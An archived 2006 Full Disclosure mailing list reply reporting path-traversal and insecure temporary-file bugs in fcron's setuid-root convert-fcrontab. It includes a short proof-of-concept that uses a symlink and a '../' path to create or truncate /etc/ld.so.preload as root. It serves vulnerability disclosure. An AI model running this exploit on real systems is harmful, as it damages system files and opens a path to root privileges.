Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: Fcrontab - memory corruption on heap.

From: Karol Wiesek <appelast () drumnbass art pl>
Date: Thu, 2 Feb 2006 20:08:26 +0100
On Wed, Feb 01, 2006 at 03:28:50PM +0100, Adam Zabrocki wrote:
=> Name:                      Fcron - convert-fcrontab
=> Vendor URL:                http://fcron.free.fr
=> Author:                    Adam Zabrocki <pi3ki31ny () wp pl>
=> Date:                      November 25, 2005
=> 
=> 
=> 
=> 
=>     Issue:
=> 
=>      Fcron (convert-fcrontab) allow users to corruption on heap section.

Hi pi3 and list,

There are much simplier bugs in convert-fcrontab, which toghether allows to gain uid0 privileges. 

* convert-fcrontab lacks any checks on file path passed to it. Attacker could get outside of fcron spool directory 
using "../".

* convert-fcrontab opens temporary file without O_EXCL flag.

PoC:

perl -e '{print "fcrontab-017\nuser\x001132863099\n\x00\x00\x00\x00"}' > /tmp/fc_file
ln -s /etc/ld.so.preload /tmp/fc_file.tmp
convert-fcrontab ../../../../tmp/fc_file 

Will create empty /etc/ld.so.preload file or truncate existing.

Tested on fcron 2.9.5 shipped with trustix 2.2 (setuid root by default), and fcron 3.0.0.

regards Karol
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Previous By Date Next
Previous By Thread Next

Current thread: